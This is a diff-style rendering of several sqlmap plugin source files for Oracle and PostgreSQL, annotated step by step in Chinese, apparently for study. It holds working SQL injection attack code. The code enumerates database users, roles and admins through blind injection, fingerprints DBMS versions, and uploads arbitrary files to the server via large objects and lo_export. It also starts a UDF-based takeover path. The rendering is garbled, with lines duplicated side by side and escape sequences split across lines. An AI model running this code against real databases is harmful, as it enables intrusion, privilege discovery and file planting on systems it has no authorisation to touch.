for value in values: for value in values:
user = None user = None
roles = set() roles = set()
for count in xrange(0, len(value or [])): for count in xrange(0, len(value or [])):
# The first column is always the username # 14. 第一列为用户名
if count == 0: if count == 0:
user = value[count] user = value[count]
# 15. 其他列为角色
# The other columns are the roles
else: else:
role = value[count] role = value[count]
# In Oracle we get the list of roles as string
roles.add(role) roles.add(role)
# 16. 将用户角色信息添加到缓存中
if user in kb.data.cachedUsersRoles: if user in kb.data.cachedUsersRoles:
kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user])) kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user]))
else: else:
kb.data.cachedUsersRoles[user] = list(roles) kb.data.cachedUsersRoles[user] = list(roles)
# 17. 如果没有获取到用户角色信息,尝试使用推断注入
if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:
# 18. 获取用户名列表
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
else: else:
@ -93,13 +99,11 @@ class Enumeration(GenericEnumeration):
users = kb.data.cachedUsers users = kb.data.cachedUsers
retrievedUsers = set() retrievedUsers = set()
# 19. 遍历用户列表,获取每个用户的角色信息
for user in users: for user in users:
unescapedUser = None unescapedUser = None
if user in retrievedUsers: if user in retrievedUsers:
continue continue
infoMsg = "fetching number of roles " infoMsg = "fetching number of roles "
infoMsg += "for user '%s'" % user infoMsg += "for user '%s'" % user
logger.info(infoMsg) logger.info(infoMsg)
@ -113,13 +117,13 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser query = rootQuery.blind.count2 % queryUser
else: else:
query = rootQuery.blind.count % queryUser query = rootQuery.blind.count % queryUser
# 20. 获取每个用户的角色数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 21. 如果没有获取到角色数量,尝试使用备用表 `USER_SYS_PRIVS`
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0 and not query2: if count != 0 and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'" infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getPrivileges(query2=True) return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
@ -133,33 +137,33 @@ class Enumeration(GenericEnumeration):
roles = set() roles = set()
indexRange = getLimitRange(count, plusOne=True) indexRange = getLimitRange(count, plusOne=True)
# 22. 遍历角色索引,获取每个角色信息
for index in indexRange: for index in indexRange:
if query2: if query2:
query = rootQuery.blind.query2 % (queryUser, index) query = rootQuery.blind.query2 % (queryUser, index)
else: else:
query = rootQuery.blind.query % (queryUser, index) query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string role = inject.getValue(query, union=False, error=False)
roles.add(role) roles.add(role)
# 23. 将获取到的角色信息添加到缓存中
if roles: if roles:
kb.data.cachedUsersRoles[user] = list(roles) kb.data.cachedUsersRoles[user] = list(roles)
else: else:
warnMsg = "unable to retrieve the roles " warnMsg = "unable to retrieve the roles "
warnMsg += "for user '%s'" % user warnMsg += "for user '%s'" % user
logger.warning(warnMsg) logger.warning(warnMsg)
retrievedUsers.add(user) retrievedUsers.add(user)
# 24. 如果没有获取到用户角色信息,抛出异常
if not kb.data.cachedUsersRoles: if not kb.data.cachedUsersRoles:
errMsg = "unable to retrieve the roles " errMsg = "unable to retrieve the roles "
errMsg += "for the database users" errMsg += "for the database users"
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
# 25. 从角色信息中判断管理员用户
for user, privileges in kb.data.cachedUsersRoles.items(): for user, privileges in kb.data.cachedUsersRoles.items():
if isAdminFromPrivileges(privileges): if isAdminFromPrivileges(privileges):
areAdmins.add(user) areAdmins.add(user)
# 26. 返回用户角色信息和管理员用户
return kb.data.cachedUsersRoles, areAdmins return kb.data.cachedUsersRoles, areAdmins

@ -5,106 +5,120 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re # 1. 导入必要的模块
import re # 正则表达式模块
from lib.core.common import Backend
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.data import conf from lib.core.common import Format # 格式化输出
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.session import setDbms from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.settings import ORACLE_ALIASES from lib.core.session import setDbms # 设置数据库管理系统
from lib.request import inject from lib.core.settings import ORACLE_ALIASES # Oracle 数据库别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型为 Oracle
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.ORACLE) GenericFingerprint.__init__(self, DBMS.ORACLE)
# 4. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
value = "" value = ""
# 5. 获取 Web 服务器的操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 6. 获取后端数据库的操作系统指纹
if kb.data.banner: if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 7. 如果没有启用详细指纹识别,则只输出数据库类型
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.ORACLE value += DBMS.ORACLE
return value return value
# 8. 获取激活的数据库指纹
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 9. 如果有 Banner 信息,则获取 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
if banVer: if banVer:
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 10. 如果有 HTML 错误信息,则获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value return value
# 11. 检查数据库类型是否为 Oracle
def checkDbms(self): def checkDbms(self):
# 12. 如果没有启用详细指纹识别,并且后端数据库是 Oracle 的别名,则设置数据库类型并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):
setDbms(DBMS.ORACLE) setDbms(DBMS.ORACLE)
self.getBanner() self.getBanner()
return True return True
# 13. 输出测试数据库类型信息
infoMsg = "testing %s" % DBMS.ORACLE infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does # 14. 如果是直接连接,则跳过以下测试
# not work connecting directly to the Oracle database
if conf.direct: if conf.direct:
result = True result = True
# 15. 否则,测试数据库是否满足条件 LENGTH(SYSDATE)=LENGTH(SYSDATE)
else: else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
# 16. 如果测试结果为 True则进一步确认数据库类型
if result: if result:
infoMsg = "confirming %s" % DBMS.ORACLE infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # 17. 如果是直接连接,则跳过以下测试
# not work connecting directly to the Oracle database
if conf.direct: if conf.direct:
result = True result = True
# 18. 否则,测试数据库是否满足条件 NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])
else: else:
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
# 19. 如果测试结果为 False则输出警告信息并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 20. 设置数据库类型为 Oracle
setDbms(DBMS.ORACLE) setDbms(DBMS.ORACLE)
self.getBanner() self.getBanner()
# 21. 如果没有启用详细指纹识别,则直接返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 22. 输出开始详细指纹识别信息
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg) logger.info(infoMsg)
# Reference: https://en.wikipedia.org/wiki/Oracle_Database # 23. 尝试匹配数据库版本
for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"): for version in ("23c", "21c", "19c", "18c", "12c", "11g", "10g", "9i", "8i", "7"):
number = int(re.search(r"([\d]+)", version).group(1)) number = int(re.search(r"([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
@ -114,15 +128,15 @@ class Fingerprint(GenericFingerprint):
break break
return True return True
# 24. 如果初始测试结果为 False则输出警告信息并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 25. 强制枚举数据库对象名称为大写
def forceDbmsEnum(self): def forceDbmsEnum(self):
if conf.db: if conf.db:
conf.db = conf.db.upper() conf.db = conf.db.upper()
if conf.tbl: if conf.tbl:
conf.tbl = conf.tbl.upper() conf.tbl = conf.tbl.upper()

@ -5,79 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os # 1. 导入所需的模块
import os # 操作系统相关模块
from lib.core.common import randomInt
from lib.core.compat import xrange from lib.core.common import randomInt # 生成随机整数
from lib.core.data import kb from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.data import logger # 日志记录器
from lib.core.settings import LOBLKSIZE from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.request import inject from lib.core.settings import LOBLKSIZE # Large Object Block Size
from plugins.generic.filesystem import Filesystem as GenericFilesystem from lib.request import inject # 注入相关函数
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 3. 构造函数,初始化变量
def __init__(self): def __init__(self):
self.oid = None self.oid = None # Large Object OID
self.page = None self.page = None # Large Object page number
GenericFilesystem.__init__(self) GenericFilesystem.__init__(self)
# 4. 使用 stacked query 读取文件
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
# 5. 如果不是暴力破解模式,则输出读取文件信息
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
# 6. 初始化环境
self.initEnv() self.initEnv()
# 7. 调用 UDF 执行读取文件操作,返回读取的内容
return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread") return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
# 8. 使用 UNION query 写入文件PostgreSQL 不支持)
def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
# 9. 输出不支持的信息并抛出异常
errMsg = "PostgreSQL does not support file upload with UNION " errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique" errMsg += "query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 10. 使用 stacked query 写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 11. 获取本地文件大小
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile)
# 12. 读取本地文件内容
content = open(localFile, "rb").read() content = open(localFile, "rb").read()
# 13. 生成随机 OID 和初始页码
self.oid = randomInt() self.oid = randomInt()
self.page = 0 self.page = 0
# 14. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text") self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 15. 输出调试信息
debugMsg = "create a new OID for a large object, it implicitly " debugMsg = "create a new OID for a large object, it implicitly "
debugMsg += "adds an entry in the large objects system table" debugMsg += "adds an entry in the large objects system table"
logger.debug(debugMsg) logger.debug(debugMsg)
# References: # References:
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
# 16. 删除已存在的 Large Object创建新的 Large Object并清理 Large Object 表
inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
inject.goStacked("SELECT lo_create(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid)
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
# 17. 循环读取文件内容,分块写入 Large Object
for offset in xrange(0, localFileSize, LOBLKSIZE): for offset in xrange(0, localFileSize, LOBLKSIZE):
# 18. 对文件内容进行 base64 编码
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
# 19. 将 base64 编码的文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList) sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 20. 执行 SQL 查询语句
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)
# 21. 向 Large Object 表插入数据
inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName))
# 22. 清理支持表
inject.goStacked("DELETE FROM %s" % self.fileTblName) inject.goStacked("DELETE FROM %s" % self.fileTblName)
# 23. 更新页码
self.page += 1 self.page += 1
# 24. 输出调试信息
debugMsg = "exporting the OID %s file content to " % fileType debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % remoteFile debugMsg += "file '%s'" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
# 25. 使用 lo_export 函数将 Large Object 内容导出到文件
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True) inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
# 26. 检查文件是否写入成功
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 27. 删除 Large Object
inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
# 28. 返回文件是否写入成功
return written return written

@ -5,29 +5,35 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import Backend # 1. 从库中导入所需的模块
from lib.core.common import Format from lib.core.common import Backend # 后端数据库信息
from lib.core.common import hashDBRetrieve from lib.core.common import Format # 格式化输出
from lib.core.common import hashDBWrite from lib.core.common import hashDBRetrieve # 从哈希数据库检索数据
from lib.core.data import conf from lib.core.common import hashDBWrite # 向哈希数据库写入数据
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.enums import DBMS from lib.core.data import logger # 日志记录器
from lib.core.enums import FORK from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import HASHDB_KEYS from lib.core.enums import FORK # 数据库分支枚举
from lib.core.enums import OS from lib.core.enums import HASHDB_KEYS # 哈希数据库键枚举
from lib.core.session import setDbms from lib.core.enums import OS # 操作系统枚举
from lib.core.settings import PGSQL_ALIASES from lib.core.session import setDbms # 设置当前数据库类型
from lib.request import inject from lib.core.settings import PGSQL_ALIASES # PostgreSQL 数据库的别名
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
class Fingerprint(GenericFingerprint): class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL) GenericFingerprint.__init__(self, DBMS.PGSQL)
# 4. 获取指纹信息
def getFingerprint(self): def getFingerprint(self):
# 5. 从哈希数据库中检索数据库分支信息
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
# 6. 如果分支信息为空,则尝试识别数据库分支
if fork is None: if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"): if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB fork = FORK.COCKROACHDB
@ -47,92 +53,109 @@ class Fingerprint(GenericFingerprint):
fork = FORK.AURORA fork = FORK.AURORA
else: else:
fork = "" fork = ""
# 7. 将分支信息写入哈希数据库
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = "" value = ""
# 8. 获取 Web 服务器操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp) wsOsFp = Format.getOs("web server", kb.headersFp)
# 9. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp: if wsOsFp:
value += "%s\n" % wsOsFp value += "%s\
" % wsOsFp
# 10. 如果有数据库 Banner 信息
if kb.data.banner: if kb.data.banner:
# 11. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 12. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp: if dbmsOsFp:
value += "%s\n" % dbmsOsFp value += "%s\
" % dbmsOsFp
value += "back-end DBMS: " value += "back-end DBMS: "
# 13. 如果不是详细指纹,则返回数据库类型和分支信息
if not conf.extensiveFp: if not conf.extensiveFp:
value += DBMS.PGSQL value += DBMS.PGSQL
if fork: if fork:
value += " (%s fork)" % fork value += " (%s fork)" % fork
return value return value
# 14. 获取活动的指纹信息
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
# 15. 如果有 Banner 解析指纹
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion") banVer = kb.bannerFp.get("dbmsVersion")
# 16. 如果有 Banner 版本号
if banVer: if banVer:
# 17. 格式化 Banner 版本号
banVer = Format.getDbms([banVer]) banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 18. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes()
# 19. 将 HTML 错误指纹添加到输出
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
# 20. 如果有数据库分支信息,则将其添加到输出
if fork: if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork) value += "\n%sfork fingerprint: %s" % (blank, fork)
# 21. 返回完整的指纹信息
return value return value
# 22. 检查数据库类型是否为 PostgreSQL
def checkDbms(self): def checkDbms(self):
""" """
References for fingerprint: References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html * https://www.postgresql.org/docs/current/static/release.html
""" """
# 23. 如果不是详细指纹,且当前数据库类型属于 PostgreSQL 别名,则设置数据库类型为 PostgreSQL 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL) setDbms(DBMS.PGSQL)
self.getBanner() self.getBanner()
return True return True
# 24. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.PGSQL infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO() # 25. 执行 SQL 查询,检查数据库类型是否为 PostgreSQL (基于 CONVERT_TO 和 QUOTE_IDENT 函数)
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL") result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
# 26. 如果查询成功
if result: if result:
# 27. 输出确认信息
infoMsg = "confirming %s" % DBMS.PGSQL infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# 28. 执行 SQL 查询,再次确认数据库类型是否为 PostgreSQL (基于 COALESCE 函数)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
# 29. 如果再次确认失败,则输出警告信息,并返回 False
if not result: if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 30. 设置数据库类型为 PostgreSQL
setDbms(DBMS.PGSQL) setDbms(DBMS.PGSQL)
# 31. 获取数据库 Banner 信息
self.getBanner() self.getBanner()
# 32. 如果不是详细指纹,则返回 True
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
# 33. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg) logger.info(infoMsg)
# 34. 通过检查不同版本的函数,设置 PostgreSQL 版本
if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"): if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"):
Backend.setVersion(">= 16.0") Backend.setVersion(">= 16.0")
elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"): elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
@ -193,39 +216,43 @@ class Fingerprint(GenericFingerprint):
Backend.setVersion("< 6.2.0") Backend.setVersion("< 6.2.0")
return True return True
# 35. 如果第一次查询失败,则输出警告信息,并返回 False
else: else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg) logger.warning(warnMsg)
return False return False
# 36. 检查数据库服务器的操作系统
def checkDbmsOs(self, detailed=False): def checkDbmsOs(self, detailed=False):
# 37. 如果已经获取到操作系统信息,则直接返回
if Backend.getOs(): if Backend.getOs():
return return
# 38. 输出正在进行操作系统指纹识别
infoMsg = "fingerprinting the back-end DBMS operating system" infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg) logger.info(infoMsg)
# 39. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)") self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
# 40. 将 VERSION() 的结果插入到支持表中
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()")) inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# 41. 定义 Windows 操作系统特有的关键字
# Windows executables should always have ' Visual C++' or ' mingw' # Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner # patterns within the banner
osWindows = (" Visual C++", "mingw") osWindows = (" Visual C++", "mingw")
# 42. 循环检查是否存在 Windows 操作系统关键字
for osPattern in osWindows: for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0" query += "LIKE '%" + osPattern + "%')>0"
# 43. 如果存在 Windows 操作系统关键字,则设置操作系统为 Windows
if inject.checkBooleanExpression(query): if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS) Backend.setOs(OS.WINDOWS)
break break
# 44. 如果没有检测到 Windows 操作系统,则设置操作系统为 Linux
if Backend.getOs() is None: if Backend.getOs() is None:
Backend.setOs(OS.LINUX) Backend.setOs(OS.LINUX)
# 45. 输出检测到的操作系统信息
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg) logger.info(infoMsg)
# 46. 清理支持表
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)

@ -5,101 +5,115 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os # 1. 导入所需的模块
import os # 操作系统相关功能
from lib.core.common import Backend
from lib.core.common import checkFile from lib.core.common import Backend # 后端数据库信息
from lib.core.common import decloakToTemp from lib.core.common import checkFile # 检查文件是否存在
from lib.core.common import flattenValue from lib.core.common import decloakToTemp # 解密临时文件路径
from lib.core.common import filterNone from lib.core.common import flattenValue # 将嵌套列表展平
from lib.core.common import isListLike from lib.core.common import filterNone # 过滤列表中的 None 值
from lib.core.common import isNoneValue from lib.core.common import isListLike # 检查是否为列表类型
from lib.core.common import isStackingAvailable from lib.core.common import isNoneValue # 检查是否为 None 值
from lib.core.common import randomStr from lib.core.common import isStackingAvailable # 检查是否支持堆叠查询
from lib.core.compat import LooseVersion from lib.core.common import randomStr # 生成随机字符串
from lib.core.data import kb from lib.core.compat import LooseVersion # 版本比较
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.data import paths from lib.core.data import logger # 日志记录器
from lib.core.enums import OS from lib.core.data import paths # 路径相关信息
from lib.core.exception import SqlmapSystemException from lib.core.enums import OS # 操作系统枚举
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapSystemException # 系统异常
from lib.request import inject from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from plugins.generic.takeover import Takeover as GenericTakeover from lib.request import inject # 注入相关函数
from plugins.generic.takeover import Takeover as GenericTakeover # 通用提权类
# 2. 定义一个类 Takeover继承自 GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
# 3. 设置远程 UDF 文件路径
def udfSetRemotePath(self): def udfSetRemotePath(self):
# On Windows # 4. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
# The DLL can be in any folder where postgres user has # 5. UDF 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# read/write/execute access is valid # 注意:不指定路径将保存在数据目录中
# NOTE: by not specifing any path, it will save into the # 在 PostgreSQL 8.3 中默认路径为C:\Program Files\PostgreSQL\8.3\data
# data directory, on PostgreSQL 8.3 it is
# C:\Program Files\PostgreSQL\8.3\data.
self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 6. 如果是 Linux 系统
# On Linux
